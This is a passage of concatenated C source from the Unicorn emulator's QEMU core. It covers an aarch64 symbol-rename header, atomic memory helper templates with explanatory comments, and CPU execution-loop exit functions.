gen_intermediate_code_aarch64 #define restore_state_to_opc restore_state_to_opc_aarch64 #define disas_sve disas_sve_aarch64 #define helper_neon_qrdmlah_s16 helper_neon_qrdmlah_s16_aarch64 #define helper_gvec_qrdmlah_s16 helper_gvec_qrdmlah_s16_aarch64 #define helper_neon_qrdmlsh_s16 helper_neon_qrdmlsh_s16_aarch64 #define helper_gvec_qrdmlsh_s16 helper_gvec_qrdmlsh_s16_aarch64 #define helper_neon_qrdmlah_s32 helper_neon_qrdmlah_s32_aarch64 #define helper_gvec_qrdmlah_s32 helper_gvec_qrdmlah_s32_aarch64 #define helper_neon_qrdmlsh_s32 helper_neon_qrdmlsh_s32_aarch64 #define helper_gvec_qrdmlsh_s32 helper_gvec_qrdmlsh_s32_aarch64 #define helper_gvec_sdot_b helper_gvec_sdot_b_aarch64 #define helper_gvec_udot_b helper_gvec_udot_b_aarch64 #define helper_gvec_sdot_h helper_gvec_sdot_h_aarch64 #define helper_gvec_udot_h 
helper_gvec_udot_h_aarch64 #define helper_gvec_sdot_idx_b helper_gvec_sdot_idx_b_aarch64 #define helper_gvec_udot_idx_b helper_gvec_udot_idx_b_aarch64 #define helper_gvec_sdot_idx_h helper_gvec_sdot_idx_h_aarch64 #define helper_gvec_udot_idx_h helper_gvec_udot_idx_h_aarch64 #define helper_gvec_fcaddh helper_gvec_fcaddh_aarch64 #define helper_gvec_fcadds helper_gvec_fcadds_aarch64 #define helper_gvec_fcaddd helper_gvec_fcaddd_aarch64 #define helper_gvec_fcmlah helper_gvec_fcmlah_aarch64 #define helper_gvec_fcmlah_idx helper_gvec_fcmlah_idx_aarch64 #define helper_gvec_fcmlas helper_gvec_fcmlas_aarch64 #define helper_gvec_fcmlas_idx helper_gvec_fcmlas_idx_aarch64 #define helper_gvec_fcmlad helper_gvec_fcmlad_aarch64 #define helper_gvec_frecpe_h helper_gvec_frecpe_h_aarch64 #define helper_gvec_frecpe_s helper_gvec_frecpe_s_aarch64 #define helper_gvec_frecpe_d helper_gvec_frecpe_d_aarch64 #define helper_gvec_frsqrte_h helper_gvec_frsqrte_h_aarch64 #define helper_gvec_frsqrte_s helper_gvec_frsqrte_s_aarch64 #define helper_gvec_frsqrte_d helper_gvec_frsqrte_d_aarch64 #define helper_gvec_fadd_h helper_gvec_fadd_h_aarch64 #define helper_gvec_fadd_s helper_gvec_fadd_s_aarch64 #define helper_gvec_fadd_d helper_gvec_fadd_d_aarch64 #define helper_gvec_fsub_h helper_gvec_fsub_h_aarch64 #define helper_gvec_fsub_s helper_gvec_fsub_s_aarch64 #define helper_gvec_fsub_d helper_gvec_fsub_d_aarch64 #define helper_gvec_fmul_h helper_gvec_fmul_h_aarch64 #define helper_gvec_fmul_s helper_gvec_fmul_s_aarch64 #define helper_gvec_fmul_d helper_gvec_fmul_d_aarch64 #define helper_gvec_ftsmul_h helper_gvec_ftsmul_h_aarch64 #define helper_gvec_ftsmul_s helper_gvec_ftsmul_s_aarch64 #define helper_gvec_ftsmul_d helper_gvec_ftsmul_d_aarch64 #define helper_gvec_recps_h helper_gvec_recps_h_aarch64 #define helper_gvec_recps_s helper_gvec_recps_s_aarch64 #define helper_gvec_recps_d helper_gvec_recps_d_aarch64 #define helper_gvec_rsqrts_h helper_gvec_rsqrts_h_aarch64 #define helper_gvec_rsqrts_s helper_gvec_rsqrts_s_aarch64 #define helper_gvec_rsqrts_d helper_gvec_rsqrts_d_aarch64 #define helper_gvec_fmul_idx_h helper_gvec_fmul_idx_h_aarch64 #define helper_gvec_fmul_idx_s helper_gvec_fmul_idx_s_aarch64 #define helper_gvec_fmul_idx_d helper_gvec_fmul_idx_d_aarch64 #define helper_gvec_fmla_idx_h helper_gvec_fmla_idx_h_aarch64 #define helper_gvec_fmla_idx_s helper_gvec_fmla_idx_s_aarch64 #define helper_gvec_fmla_idx_d helper_gvec_fmla_idx_d_aarch64 #define helper_gvec_uqadd_b helper_gvec_uqadd_b_aarch64 #define helper_gvec_uqadd_h helper_gvec_uqadd_h_aarch64 #define helper_gvec_uqadd_s helper_gvec_uqadd_s_aarch64 #define helper_gvec_sqadd_b helper_gvec_sqadd_b_aarch64 #define helper_gvec_sqadd_h helper_gvec_sqadd_h_aarch64 #define helper_gvec_sqadd_s helper_gvec_sqadd_s_aarch64 #define helper_gvec_uqsub_b helper_gvec_uqsub_b_aarch64 #define helper_gvec_uqsub_h helper_gvec_uqsub_h_aarch64 #define helper_gvec_uqsub_s helper_gvec_uqsub_s_aarch64 #define helper_gvec_sqsub_b helper_gvec_sqsub_b_aarch64 #define helper_gvec_sqsub_h helper_gvec_sqsub_h_aarch64 #define helper_gvec_sqsub_s helper_gvec_sqsub_s_aarch64 #define helper_gvec_uqadd_d helper_gvec_uqadd_d_aarch64 #define helper_gvec_uqsub_d helper_gvec_uqsub_d_aarch64 #define helper_gvec_sqadd_d helper_gvec_sqadd_d_aarch64 #define helper_gvec_sqsub_d helper_gvec_sqsub_d_aarch64 #define helper_gvec_fmlal_a32 helper_gvec_fmlal_a32_aarch64 #define helper_gvec_fmlal_a64 helper_gvec_fmlal_a64_aarch64 #define helper_gvec_fmlal_idx_a32 helper_gvec_fmlal_idx_a32_aarch64 #define 
helper_gvec_fmlal_idx_a64 helper_gvec_fmlal_idx_a64_aarch64 #define helper_gvec_sshl_b helper_gvec_sshl_b_aarch64 #define helper_gvec_sshl_h helper_gvec_sshl_h_aarch64 #define helper_gvec_ushl_b helper_gvec_ushl_b_aarch64 #define helper_gvec_ushl_h helper_gvec_ushl_h_aarch64 #define helper_gvec_pmul_b helper_gvec_pmul_b_aarch64 #define helper_gvec_pmull_q helper_gvec_pmull_q_aarch64 #define helper_neon_pmull_h helper_neon_pmull_h_aarch64 #define helper_sve2_pmull_h helper_sve2_pmull_h_aarch64 #define helper_vfp_get_fpscr helper_vfp_get_fpscr_aarch64 #define vfp_get_fpscr vfp_get_fpscr_aarch64 #define helper_vfp_set_fpscr helper_vfp_set_fpscr_aarch64 #define vfp_set_fpscr vfp_set_fpscr_aarch64 #define helper_vfp_adds helper_vfp_adds_aarch64 #define helper_vfp_addd helper_vfp_addd_aarch64 #define helper_vfp_subs helper_vfp_subs_aarch64 #define helper_vfp_subd helper_vfp_subd_aarch64 #define helper_vfp_muls helper_vfp_muls_aarch64 #define helper_vfp_muld helper_vfp_muld_aarch64 #define helper_vfp_divs helper_vfp_divs_aarch64 #define helper_vfp_divd helper_vfp_divd_aarch64 #define helper_vfp_mins helper_vfp_mins_aarch64 #define helper_vfp_mind helper_vfp_mind_aarch64 #define helper_vfp_maxs helper_vfp_maxs_aarch64 #define helper_vfp_maxd helper_vfp_maxd_aarch64 #define helper_vfp_minnums helper_vfp_minnums_aarch64 #define helper_vfp_minnumd helper_vfp_minnumd_aarch64 #define helper_vfp_maxnums helper_vfp_maxnums_aarch64 #define helper_vfp_maxnumd helper_vfp_maxnumd_aarch64 #define helper_vfp_negs helper_vfp_negs_aarch64 #define helper_vfp_negd helper_vfp_negd_aarch64 #define helper_vfp_abss helper_vfp_abss_aarch64 #define helper_vfp_absd helper_vfp_absd_aarch64 #define helper_vfp_sqrts helper_vfp_sqrts_aarch64 #define helper_vfp_sqrtd helper_vfp_sqrtd_aarch64 #define helper_vfp_cmps helper_vfp_cmps_aarch64 #define helper_vfp_cmpes helper_vfp_cmpes_aarch64 #define helper_vfp_cmpd helper_vfp_cmpd_aarch64 #define helper_vfp_cmped helper_vfp_cmped_aarch64 #define helper_vfp_sitoh helper_vfp_sitoh_aarch64 #define helper_vfp_tosih helper_vfp_tosih_aarch64 #define helper_vfp_tosizh helper_vfp_tosizh_aarch64 #define helper_vfp_sitos helper_vfp_sitos_aarch64 #define helper_vfp_tosis helper_vfp_tosis_aarch64 #define helper_vfp_tosizs helper_vfp_tosizs_aarch64 #define helper_vfp_sitod helper_vfp_sitod_aarch64 #define helper_vfp_tosid helper_vfp_tosid_aarch64 #define helper_vfp_tosizd helper_vfp_tosizd_aarch64 #define helper_vfp_uitoh helper_vfp_uitoh_aarch64 #define helper_vfp_touih helper_vfp_touih_aarch64 #define helper_vfp_touizh helper_vfp_touizh_aarch64 #define helper_vfp_uitos helper_vfp_uitos_aarch64 #define helper_vfp_touis helper_vfp_touis_aarch64 #define helper_vfp_touizs helper_vfp_touizs_aarch64 #define helper_vfp_uitod helper_vfp_uitod_aarch64 #define helper_vfp_touid helper_vfp_touid_aarch64 #define helper_vfp_touizd helper_vfp_touizd_aarch64 #define helper_vfp_fcvtds helper_vfp_fcvtds_aarch64 #define helper_vfp_fcvtsd helper_vfp_fcvtsd_aarch64 #define helper_vfp_shtod helper_vfp_shtod_aarch64 #define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_aarch64 #define helper_vfp_toshd helper_vfp_toshd_aarch64 #define helper_vfp_sltod helper_vfp_sltod_aarch64 #define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_aarch64 #define helper_vfp_tosld helper_vfp_tosld_aarch64 #define helper_vfp_sqtod helper_vfp_sqtod_aarch64 #define helper_vfp_tosqd helper_vfp_tosqd_aarch64 #define helper_vfp_uhtod helper_vfp_uhtod_aarch64 #define helper_vfp_touhd_round_to_zero 
helper_vfp_touhd_round_to_zero_aarch64 #define helper_vfp_touhd helper_vfp_touhd_aarch64 #define helper_vfp_ultod helper_vfp_ultod_aarch64 #define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_aarch64 #define helper_vfp_tould helper_vfp_tould_aarch64 #define helper_vfp_uqtod helper_vfp_uqtod_aarch64 #define helper_vfp_touqd helper_vfp_touqd_aarch64 #define helper_vfp_shtos helper_vfp_shtos_aarch64 #define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_aarch64 #define helper_vfp_toshs helper_vfp_toshs_aarch64 #define helper_vfp_sltos helper_vfp_sltos_aarch64 #define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_aarch64 #define helper_vfp_tosls helper_vfp_tosls_aarch64 #define helper_vfp_sqtos helper_vfp_sqtos_aarch64 #define helper_vfp_tosqs helper_vfp_tosqs_aarch64 #define helper_vfp_uhtos helper_vfp_uhtos_aarch64 #define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_aarch64 #define helper_vfp_touhs helper_vfp_touhs_aarch64 #define helper_vfp_ultos helper_vfp_ultos_aarch64 #define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_aarch64 #define helper_vfp_touls helper_vfp_touls_aarch64 #define helper_vfp_uqtos helper_vfp_uqtos_aarch64 #define helper_vfp_touqs helper_vfp_touqs_aarch64 #define helper_vfp_sltoh helper_vfp_sltoh_aarch64 #define helper_vfp_ultoh helper_vfp_ultoh_aarch64 #define helper_vfp_sqtoh helper_vfp_sqtoh_aarch64 #define helper_vfp_uqtoh helper_vfp_uqtoh_aarch64 #define helper_vfp_toshh helper_vfp_toshh_aarch64 #define helper_vfp_touhh helper_vfp_touhh_aarch64 #define helper_vfp_toslh helper_vfp_toslh_aarch64 #define helper_vfp_toulh helper_vfp_toulh_aarch64 #define helper_vfp_tosqh helper_vfp_tosqh_aarch64 #define helper_vfp_touqh helper_vfp_touqh_aarch64 #define helper_set_rmode helper_set_rmode_aarch64 #define helper_set_neon_rmode helper_set_neon_rmode_aarch64 #define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_aarch64 #define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_aarch64 #define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_aarch64 #define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_aarch64 #define helper_recps_f32 helper_recps_f32_aarch64 #define helper_rsqrts_f32 helper_rsqrts_f32_aarch64 #define helper_recpe_f16 helper_recpe_f16_aarch64 #define helper_recpe_f32 helper_recpe_f32_aarch64 #define helper_recpe_f64 helper_recpe_f64_aarch64 #define helper_rsqrte_f16 helper_rsqrte_f16_aarch64 #define helper_rsqrte_f32 helper_rsqrte_f32_aarch64 #define helper_rsqrte_f64 helper_rsqrte_f64_aarch64 #define helper_recpe_u32 helper_recpe_u32_aarch64 #define helper_rsqrte_u32 helper_rsqrte_u32_aarch64 #define helper_vfp_muladds helper_vfp_muladds_aarch64 #define helper_vfp_muladdd helper_vfp_muladdd_aarch64 #define helper_rints_exact helper_rints_exact_aarch64 #define helper_rintd_exact helper_rintd_exact_aarch64 #define helper_rints helper_rints_aarch64 #define helper_rintd helper_rintd_aarch64 #define arm_rmode_to_sf arm_rmode_to_sf_aarch64 #define helper_fjcvtzs helper_fjcvtzs_aarch64 #define helper_vjcvt helper_vjcvt_aarch64 #define helper_frint32_s helper_frint32_s_aarch64 #define helper_frint64_s helper_frint64_s_aarch64 #define helper_frint32_d helper_frint32_d_aarch64 #define helper_frint64_d helper_frint64_d_aarch64 #define helper_check_hcr_el2_trap helper_check_hcr_el2_trap_aarch64 #define mla_op mla_op_aarch64 #define mls_op mls_op_aarch64 #define sshl_op sshl_op_aarch64 #define ushl_op ushl_op_aarch64 #define uqsub_op uqsub_op_aarch64 #define 
sqsub_op sqsub_op_aarch64 #define uqadd_op uqadd_op_aarch64 #define sqadd_op sqadd_op_aarch64 #define sli_op sli_op_aarch64 #define cmtst_op cmtst_op_aarch64 #define sri_op sri_op_aarch64 #define usra_op usra_op_aarch64 #define ssra_op ssra_op_aarch64 #define aarch64_translator_ops aarch64_translator_ops_aarch64 #define pred_esz_masks pred_esz_masks_aarch64 #define helper_uc_hooksys64 helper_uc_hooksys64_aarch64 #endif
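
/*
 * Illustration (not from the original header): TARGET_AARCH64 builds
 * force-include this rename map, so a generic call site such as
 *
 *     helper_sve_fsqrt_s(vd, vn, vg, status, desc);
 *
 * is rewritten by the preprocessor into helper_sve_fsqrt_s_aarch64(...).
 * Compiling the shared QEMU core once per target with a map like this
 * keeps the per-target symbols from colliding inside a single library.
 */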

unicorn-2.1.1/qemu/accel/tcg/atomic_template.h

/*
 * Atomic helper templates
 * Included from tcg-runtime.c and cputlb.c.
 *
 * Copyright (c) 2016 Red Hat, Inc
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#if DATA_SIZE == 16
# define SUFFIX     o
# define DATA_TYPE  Int128
# define BSWAP      bswap128
# define SHIFT      4
#elif DATA_SIZE == 8
# define SUFFIX     q
# define DATA_TYPE  uint64_t
# define SDATA_TYPE int64_t
# define BSWAP      bswap64
# define SHIFT      3
#elif DATA_SIZE == 4
# define SUFFIX     l
# define DATA_TYPE  uint32_t
# define SDATA_TYPE int32_t
# define BSWAP      bswap32
# define SHIFT      2
#elif DATA_SIZE == 2
# define SUFFIX     w
# define DATA_TYPE  uint16_t
# define SDATA_TYPE int16_t
# define BSWAP      bswap16
# define SHIFT      1
#elif DATA_SIZE == 1
# define SUFFIX     b
# define DATA_TYPE  uint8_t
# define SDATA_TYPE int8_t
# define BSWAP
# define SHIFT      0
#else
# error unsupported data size
#endif

#if DATA_SIZE >= 4
# define ABI_TYPE  DATA_TYPE
#else
# define ABI_TYPE  uint32_t
#endif

/* Define host-endian atomic operations.  Note that END is used within
   the ATOMIC_NAME macro, and redefined below.  */
#if DATA_SIZE == 1
# define END
#elif defined(HOST_WORDS_BIGENDIAN)
# define END  _be
#else
# define END  _le
#endif

ABI_TYPE ATOMIC_NAME(cmpxchg)(CPUArchState *env, target_ulong addr,
                              ABI_TYPE cmpv, ABI_TYPE newv EXTRA_ARGS)
{
    ATOMIC_MMU_DECLS;
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP;
    DATA_TYPE ret;
#if DATA_SIZE == 16
    ret = atomic16_cmpxchg(haddr, cmpv, newv);
#else
#ifdef _MSC_VER
    ret = atomic_cmpxchg__nocheck((long *)haddr, cmpv, newv);
#else
    ret = atomic_cmpxchg__nocheck(haddr, cmpv, newv);
#endif
#endif
    ATOMIC_MMU_CLEANUP;
    return ret;
}

#if DATA_SIZE >= 16
#if HAVE_ATOMIC128
ABI_TYPE ATOMIC_NAME(ld)(CPUArchState *env, target_ulong addr EXTRA_ARGS)
{
    ATOMIC_MMU_DECLS;
    DATA_TYPE val, *haddr = ATOMIC_MMU_LOOKUP;

    val = atomic16_read(haddr);
    ATOMIC_MMU_CLEANUP;
    return val;
}

void ATOMIC_NAME(st)(CPUArchState *env, target_ulong addr,
                     ABI_TYPE val EXTRA_ARGS)
{
    ATOMIC_MMU_DECLS;
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP;

    atomic16_set(haddr, val);
    ATOMIC_MMU_CLEANUP;
}
#endif
#else
ABI_TYPE ATOMIC_NAME(xchg)(CPUArchState *env, target_ulong addr,
                           ABI_TYPE val EXTRA_ARGS)
{
    ATOMIC_MMU_DECLS;
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP;
    DATA_TYPE ret;

    ret = *haddr;
    *haddr = val;
    ATOMIC_MMU_CLEANUP;
    return ret;
}

#ifdef _MSC_VER
#define GEN_ATOMIC_HELPER(X) \
ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \
                        ABI_TYPE val EXTRA_ARGS) \
{ \
    ATOMIC_MMU_DECLS; \
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \
    DATA_TYPE ret; \
    ret = atomic_##X((long *)haddr, val); \
    ATOMIC_MMU_CLEANUP; \
    return ret; \
}
#else
#define GEN_ATOMIC_HELPER(X) \
ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \
                        ABI_TYPE val EXTRA_ARGS) \
{ \
    ATOMIC_MMU_DECLS; \
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \
    DATA_TYPE ret; \
    ret = atomic_##X(haddr, val); \
    ATOMIC_MMU_CLEANUP; \
    return ret; \
}
#endif

GEN_ATOMIC_HELPER(fetch_add)
GEN_ATOMIC_HELPER(fetch_and)
GEN_ATOMIC_HELPER(fetch_or)
GEN_ATOMIC_HELPER(fetch_xor)
GEN_ATOMIC_HELPER(add_fetch)
GEN_ATOMIC_HELPER(and_fetch)
GEN_ATOMIC_HELPER(or_fetch)
GEN_ATOMIC_HELPER(xor_fetch)

#undef GEN_ATOMIC_HELPER
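
/*
 * Illustrative expansion (assuming DATA_SIZE == 4, a little-endian host,
 * and the usual ATOMIC_NAME glue from the including file, e.g. cputlb.c):
 * GEN_ATOMIC_HELPER(fetch_add) above produces, roughly,
 *
 *     uint32_t helper_atomic_fetch_addl_le_mmu(CPUArchState *env,
 *                                              target_ulong addr,
 *                                              uint32_t val, ...)
 *     {
 *         uint32_t *haddr = ATOMIC_MMU_LOOKUP;    // host pointer for addr
 *         uint32_t ret = atomic_fetch_add(haddr, val);
 *         ATOMIC_MMU_CLEANUP;
 *         return ret;                             // value before the add
 *     }
 */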

/* These helpers are, as a whole, full barriers.  Within the helper,
 * the leading barrier is explicit and the trailing barrier is within
 * cmpxchg primitive.
 *
 * Trace this load + RMW loop as a single RMW op. This way, regardless
 * of CF_PARALLEL's value, we'll trace just a read and a write.
 */
#define GEN_ATOMIC_HELPER_FN(X, FN, XDATA_TYPE, RET) \
ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \
                        ABI_TYPE xval EXTRA_ARGS) \
{ \
    ATOMIC_MMU_DECLS; \
    XDATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \
    XDATA_TYPE cmp, old, new, val = xval; \
    cmp = *haddr; \
    do { \
        old = cmp; new = FN(old, val); \
        cmp = *haddr; \
        if (cmp == old) \
            *haddr = new; \
    } while (cmp != old); \
    ATOMIC_MMU_CLEANUP; \
    return RET; \
}

GEN_ATOMIC_HELPER_FN(fetch_smin, MIN, SDATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(fetch_umin, MIN, DATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(fetch_smax, MAX, SDATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(fetch_umax, MAX, DATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(smin_fetch, MIN, SDATA_TYPE, new)
GEN_ATOMIC_HELPER_FN(umin_fetch, MIN, DATA_TYPE, new)
GEN_ATOMIC_HELPER_FN(smax_fetch, MAX, SDATA_TYPE, new)
GEN_ATOMIC_HELPER_FN(umax_fetch, MAX, DATA_TYPE, new)

#undef GEN_ATOMIC_HELPER_FN
#endif /* DATA_SIZE >= 16 */

#undef END

#if DATA_SIZE > 1

/* Define reverse-host-endian atomic operations.  Note that END is used
   within the ATOMIC_NAME macro.  */
#ifdef HOST_WORDS_BIGENDIAN
# define END  _le
#else
# define END  _be
#endif

ABI_TYPE ATOMIC_NAME(cmpxchg)(CPUArchState *env, target_ulong addr,
                              ABI_TYPE cmpv, ABI_TYPE newv EXTRA_ARGS)
{
    ATOMIC_MMU_DECLS;
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP;
    DATA_TYPE ret;
#if DATA_SIZE == 16
    ret = atomic16_cmpxchg(haddr, BSWAP(cmpv), BSWAP(newv));
#else
#ifdef _MSC_VER
    ret = atomic_cmpxchg__nocheck((long *)haddr, BSWAP(cmpv), BSWAP(newv));
#else
    ret = atomic_cmpxchg__nocheck(haddr, BSWAP(cmpv), BSWAP(newv));
#endif
#endif
    ATOMIC_MMU_CLEANUP;
    return BSWAP(ret);
}

#if DATA_SIZE >= 16
#if HAVE_ATOMIC128
ABI_TYPE ATOMIC_NAME(ld)(CPUArchState *env, target_ulong addr EXTRA_ARGS)
{
    ATOMIC_MMU_DECLS;
    DATA_TYPE val, *haddr = ATOMIC_MMU_LOOKUP;

    val = atomic16_read(haddr);
    ATOMIC_MMU_CLEANUP;
    return BSWAP(val);
}

void ATOMIC_NAME(st)(CPUArchState *env, target_ulong addr,
                     ABI_TYPE val EXTRA_ARGS)
{
    ATOMIC_MMU_DECLS;
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP;

    val = BSWAP(val);
    atomic16_set(haddr, val);
    ATOMIC_MMU_CLEANUP;
}
#endif
#else
ABI_TYPE ATOMIC_NAME(xchg)(CPUArchState *env, target_ulong addr,
                           ABI_TYPE val EXTRA_ARGS)
{
    ATOMIC_MMU_DECLS;
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP;
    ABI_TYPE ret;

    ret = *haddr;
    *haddr = BSWAP(val);
    ATOMIC_MMU_CLEANUP;
    return BSWAP(ret);
}

#ifdef _MSC_VER
#define GEN_ATOMIC_HELPER(X) \
ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \
                        ABI_TYPE val EXTRA_ARGS) \
{ \
    ATOMIC_MMU_DECLS; \
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \
    DATA_TYPE ret; \
    ret = atomic_##X((long *)haddr, BSWAP(val)); \
    ATOMIC_MMU_CLEANUP; \
    return BSWAP(ret); \
}
#else
#define GEN_ATOMIC_HELPER(X) \
ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \
                        ABI_TYPE val EXTRA_ARGS) \
{ \
    ATOMIC_MMU_DECLS; \
    DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \
    DATA_TYPE ret; \
    ret = atomic_##X(haddr, BSWAP(val)); \
    ATOMIC_MMU_CLEANUP; \
    return BSWAP(ret); \
}
#endif

GEN_ATOMIC_HELPER(fetch_and)
GEN_ATOMIC_HELPER(fetch_or)
GEN_ATOMIC_HELPER(fetch_xor)
GEN_ATOMIC_HELPER(and_fetch)
GEN_ATOMIC_HELPER(or_fetch)
GEN_ATOMIC_HELPER(xor_fetch)

#undef GEN_ATOMIC_HELPER
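
/*
 * Illustrative note on why plain GEN_ATOMIC_HELPER suffices for the bitwise
 * ops above: for and/or/xor the operation commutes with byte swapping,
 * i.e. BSWAP(a) op BSWAP(b) == BSWAP(a op b), so swapping the input value
 * and the returned value is enough.  That identity fails for arithmetic
 * once a carry crosses a byte boundary; with 16-bit values,
 * BSWAP(0x00FF) + BSWAP(0x0001) == 0xFF00 + 0x0100 == 0x0000, whereas
 * BSWAP(0x00FF + 0x0001) == 0x0001.  This is why fetch_add/add_fetch are
 * instead built from the cmpxchg-style loop that follows.
 */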

/* These helpers are, as a whole, full barriers.  Within the helper,
 * the leading barrier is explicit and the trailing barrier is within
 * cmpxchg primitive.
 *
 * Trace this load + RMW loop as a single RMW op. This way, regardless
 * of CF_PARALLEL's value, we'll trace just a read and a write.
 */
#define GEN_ATOMIC_HELPER_FN(X, FN, XDATA_TYPE, RET) \
ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \
                        ABI_TYPE xval EXTRA_ARGS) \
{ \
    ATOMIC_MMU_DECLS; \
    XDATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \
    XDATA_TYPE ldo, ldn, old, new, val = xval; \
    ldn = *haddr; \
    do { \
        ldo = ldn; old = BSWAP(ldo); new = FN(old, val); \
        ldn = *haddr; \
        if (ldn == ldo) \
            *haddr = BSWAP(new); \
    } while (ldo != ldn); \
    ATOMIC_MMU_CLEANUP; \
    return RET; \
}

GEN_ATOMIC_HELPER_FN(fetch_smin, MIN, SDATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(fetch_umin, MIN, DATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(fetch_smax, MAX, SDATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(fetch_umax, MAX, DATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(smin_fetch, MIN, SDATA_TYPE, new)
GEN_ATOMIC_HELPER_FN(umin_fetch, MIN, DATA_TYPE, new)
GEN_ATOMIC_HELPER_FN(smax_fetch, MAX, SDATA_TYPE, new)
GEN_ATOMIC_HELPER_FN(umax_fetch, MAX, DATA_TYPE, new)

/* Note that for addition, we need to use a separate cmpxchg loop instead
   of bswaps for the reverse-host-endian helpers.  */
#define ADD(X, Y)   (X + Y)
GEN_ATOMIC_HELPER_FN(fetch_add, ADD, DATA_TYPE, old)
GEN_ATOMIC_HELPER_FN(add_fetch, ADD, DATA_TYPE, new)
#undef ADD

#undef GEN_ATOMIC_HELPER_FN
#endif /* DATA_SIZE >= 16 */

#undef END
#endif /* DATA_SIZE > 1 */

#undef BSWAP
#undef ABI_TYPE
#undef DATA_TYPE
#undef SDATA_TYPE
#undef SUFFIX
#undef DATA_SIZE
#undef SHIFT

unicorn-2.1.1/qemu/accel/tcg/cpu-exec-common.c

/*
 * emulator main execution loop
 *
 * Copyright (c) 2003-2005 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "sysemu/cpus.h"
#include "sysemu/tcg.h"
#include "exec/exec-all.h"

/* exit the current TB, but without causing any exception to be raised */
void cpu_loop_exit_noexc(CPUState *cpu)
{
    cpu->exception_index = -1;
    cpu_loop_exit(cpu);
}

void cpu_reloading_memory_map(void)
{
}
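
/*
 * Illustrative note: cpu_loop_exit() below never returns; it longjmps back
 * to the sigsetjmp() in cpu_exec().  A minimal sketch of the pairing,
 * assuming a single nesting level:
 *
 *     if (sigsetjmp(uc->jmp_bufs[0], 0) == 0) {
 *         ...run generated code...        // may call cpu_loop_exit()
 *     } else {
 *         ...control resumes here after cpu_loop_exit()...
 *     }
 */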
void cpu_loop_exit(CPUState *cpu)
{
    /* Unlock JIT write protect if applicable. */
    if (cpu->uc->nested_level == 1) {
        tb_exec_unlock(cpu->uc);
    }
    /* Undo the setting in cpu_tb_exec.  */
    cpu->can_do_io = 1;
    siglongjmp(cpu->uc->jmp_bufs[cpu->uc->nested_level - 1], 1);
}

void cpu_loop_exit_restore(CPUState *cpu, uintptr_t pc)
{
    if (pc) {
        cpu_restore_state(cpu, pc, true);
    }
    cpu_loop_exit(cpu);
}

void cpu_loop_exit_atomic(CPUState *cpu, uintptr_t pc)
{
    cpu->exception_index = EXCP_ATOMIC;
    cpu_loop_exit_restore(cpu, pc);
}

unicorn-2.1.1/qemu/accel/tcg/cpu-exec.c

/*
 * emulator main execution loop
 *
 * Copyright (c) 2003-2005 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "qemu-common.h"
#include "hw/core/cpu.h"
#include "exec/exec-all.h"
#include "tcg/tcg.h"
#include "qemu/atomic.h"
#include "qemu/timer.h"
#include "exec/tb-hash.h"
#include "exec/tb-lookup.h"
